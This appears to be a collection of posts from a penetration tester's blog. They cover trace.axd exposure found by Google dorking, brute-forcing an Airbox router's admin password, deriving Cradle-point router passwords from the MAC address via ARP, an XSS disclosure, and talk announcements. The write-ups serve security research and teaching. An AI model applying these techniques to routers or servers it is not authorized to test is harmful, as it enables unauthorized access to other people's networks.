Traversing Trace.axd and Miconfiguration Glitch

Recently, I was going through attack research's blog post on trace.axd. Refer here http://carnal0wnage.attackresearch.com/2012/05/from-low-to-pwned-12-traceaxd.html. The information present in trace files is always important and sometimes reap additional benefits from pen tester's perspective. There is some additional info I want to add because of misconfiguration in web server setup. Some simple information but worth while.

During my testing, I have seen that redirection misconfiguration of port 80  to port 443 including path entries can cause serious implications. I am taking a simple example of trace.axd. Triggering a google dork as (inurl:trace filetype:axd site:com),  results in several targets. Here is an interesting case study.

1. On accessing through browsers, the target results in following information

The response headers are:

(Status-Line)    HTTP/1.1 403 Forbidden
Cache-Control    private
Content-Type    text/html; charset=utf-8
Server    Microsoft-IIS/7.5
X-AspNet-Version    2.0.50727
X-Powered-By    ASP.NET
Date    Wed, 30 May 2012 18:41:24 GMT
Content-Length    2062

 The metasploit  produces the similar result.

2. This is not an end. Due to inappropriate configuration, the server can be accessed over HTTPS. Really, let's see.

The response headers for this request are

(Status-Line)    HTTP/1.1 200 OK
Cache-Control    private
Content-Type    text/html; charset=utf-8
Content-Encoding    gzip
Vary    Accept-Encoding
Server    Microsoft-IIS/7.5
X-AspNet-Version    2.0.50727
X-Powered-By    ASP.NET
Date    Wed, 30 May 2012 18:40:59 GMT
Content-Length    1322

In reality, the misconfiguration results in different results. By default, the content should not be allowed over both ports or similar error message should be displayed.

Use metasploit auxiliary module to extract all information or surf directly through browser.

The overall aim is to check all the entry points while doing penetration testing. 

Enjoy !

Responsible Disclosure - XSS in ZScaler Gateway Application

Updated: I mentioned this issue to the Securityweek's author Steve Regan after reading his story here: http://www.securityweek.com/zscaler-accused-throwing-stones-glass-house-over-xss-vulnerability. He
quoted this blog past as an addition to the story.

Some of the XSS bugs were responsibly disclosed to the security team at ZScaler. Thanks to Michael Sutton for responding quickly. The vulnerability is patched now.

Proof of Concept is here:

We stick to responsible disclosure to build the community more secure.

Enjoy !

McAfee or is it Mcaf.ee - Interesting !

Update: Seems like a legitimate service by McAfee. The geek-mode functionality  raised a suspicion. Thanks to anonymous for pointing this out.

I was looking for some interesting malware samples and came across with hilarious but rogue domain using McAfee name. It is actually a URL shortening service hosted on this domain. If you want to try, do it here by clicking this http://mcaf.ee.

Typically, the shortening and expansion process work as presented below

mcaf.ee~>  s http://www.google.com
> The shortened url is >> http://mcaf.ee/f1cd29 << [Copy]
mcaf.ee~> e http://mcaf.ee/f1cd29 > The expanded url is >> http://www.google.com << [Copy]
mcaf.ee~>
   
Following URL's are accessed by this service for primary actions.

[1] hxxp://mcaf.ee/api/shorten?callback=jsonp1337557363223&input_url=http%3A%2F%2Fwww.google.com

[2] hxxpp://mcaf.ee/assets/ZeroClipboard10.swf

The analysis of ZeroClipboard10.swf is present here : http://jsunpack.jeek.org/?report=5c4bf5f21ec4870d16e89e9d8f32bee124a8344b

Other interesting links are as follows:

hxxp://mcaf.ee/config?geekmode=1
hxxp://mcaf.ee/js/geek.js

The domain still up as for now. You might want to take a look :)

Fun Hacking - Story of WiFi Airbox Cellular Routers

I am always curious to know more about the new network devices such WiFi routers. So I started hitting at it. Basically, mobile WiFi provides default access to internet connection. I pushed my device to be in the network.

1. A quick IP lookup provided me with the IP address of the mobile WiFi router present in the

2. The very basic thing is to surf the web admin console which by default provides the basic HTTP authentication prompt. At this point, I got to have the details of the mobile WiFi router. So I quickly issued [ echo "GET / HTTP/1.0" | nc 192.168.100.1] to extract the HTTP response from the running web server that was used for administration. Unfortunately, it was not giving any reply. That's fine.

3. A quick scan leveraged that port 81 was opened. So I fired the web browser to see if something was there for me on port 81.The port displayed the following web page

 

Yeah, that's more than the information I wanted. The mobile WiFi router was AIRBOX cellular designed by waav.com. Additionally, port 53 was also opened for DNS querying but that was not the target point.

4. So, the next step was to download the manual of this WiFi router. I did and carefully read it. As common, the airbox router use to have  default credentials. Look at the excerpt from the AIRBOX manual :http://waav.com/AirBox_Manual_V2.5.pdf.

 

5. Based on this information, I build the password list and also used the standard password lists to brute force the account. Within a few seconds. I got the admin interface password. If you are lucky, you will find default credentials present on these routers. Security is always creepy for these devices. I always look for the DHCP leases to find out the number of devices that are connected to the router. As said, I did the same

 So the lesson is, we need to delve more into security.

Android Emulator - Pentesting - Encountered Errors

The "INSTALL_FAILED_MISSING_SHARED_LIBRARY" is a very common problem which is encountered normally in day to day operations. This error is legitimately thrown by the android emulator when a new application is forced to install for testing purposes.

This error is an outcome of inappropriate selection of Android API or Google API. The application might require either of the API's. If your Android Virtual Device (AVD) is build to use one of it , you are going to face this problem.

For example: let's have a look at this emulator



and now we want to install, anti toolkit on it which results in following error



The next step, we tried this -



The result is as expected



Always provide appropriate partition size for AVD to avoid any stringency while testing.

Hacking Cradle Point Routers - Obscurity at the Peak

Cradle-point wireless routers are used heavily for setting small networks. However, Cradle-point uses interesting MAC specific authentication credentials which are unique for every router because of the MAC address uniqueness. In general, Cradle-point opts this behavior in order to provide more entropy in the authentication scheme rather depending on default password mechanism, which most of the LAN/WLAN router uses.

Cradle-point uses last six characters of MAC address for authentication by default. Well, in general it seems interesting because it looks like things are more secure. However, this is not appropriate from security point of view. For administrative logins and user authentication for the first time, a login page is displayed that looks for internet access password.

The question is; How to get the password for unmanaged routers? Well, it is in MAC address. However, the obscure part is, once you are inside a WLAN , you are already having an IP address. It means Address Resolution Protocol (ARP) is the key that maps the network layer address (IP) to the link layer(Ethernet/MAC). The login page looks like as follows



The designers made a mistake in setting this type of layout because in order to get the administrative webpage, the client has to connect to the network if it is active. Right!. Yes it is. Once a user activates the wireless connection it gets connected to the same WLAN which has a gateway address of 192.168.0.1 (default for Cradle-point routers). It is hilarious but it is trivial to subvert the stuff to get the password. Now, the hacker is in the network, so we can get possible ARP entry which resolute the IP address to the MAC address (simply ping the gateway) for the router.



As per the documentation, the password has to be 071640. Let’s try



So ..........



Configure your devices in a secure manner.

Virus Bulletin - Talk

Check out my virus bulletin talk - http://www.virusbtn.com/conference/vb2011/590oYHwdzKZp/abstracts/Sood.xml

OWASP Talk - The Good Hacker - Hunting Web Malware

The Good Hacker:Dismantling Web Malware with Aditya K Sood & Richard J Enbody, SecNiche Security Labs, Michigan State University from OWASP on Vimeo.

BruCon 2011 - Botnets and Browsers

I presented at BruCon 2011 on Botnets and Browsers.

BruCon (Brussels 2011) Hacking Conference - Botnets and Browsers (Brothers in the Ghost Shell)

View more presentations from Aditya K Sood

A nice writeup is here - http://blog.c22.cc/2011/09/20/brucon-botnets-and-browsers-brothers-in-a-ghost-shell/

Enjoy !

Source Seattle 2011 - Video Up - Art of InfoJacking

In May , I presented about Art of InfoJacking in Source Seattle. The video can be seen here.

PenTest Magazine - Breaking Down i*{Devices} - Testing iPhone Security

Smartphones have revolutionized the world. The online world is grappling with severe security and privacy issues. The smartphone applications require an aggressive approach of security testing and integrity verification in order to serve the three metrics of security such as confidentiality, integrity and availability.

This paper sheds a light on the behavioral testing and security issues present in Apple’s IOS devices and applications. Primarily, this paper revolves around penetration testing of iPhone device and its applications. The paper does not discuss the iPhone application source code analysis and reverse engineering.

Download the magazine from : HERE

PenTest Magazine Teaser - Mobile Hacking

View more documents from Aditya K Sood

Dissecting Java Server Faces for Penetration Testing

This paper sheds light on the findings of security testing of Java Server Faces. JSF has been widely used as an open source web framework for developing efficient applications using J2EE. JSF is compared with ASP.NET framework to unearth potential security flaws.

This paper is an outcome of my work at Cigital Labs. It is a collaborative work with Security Compass team.

Download : http://www.cigital.com/papers/download/dissecting_jsf_pt_aks_kr.pdf

Dissecting Java Server Faces for Penetration Testing

View more documents from Aditya K Sood

Enjoy!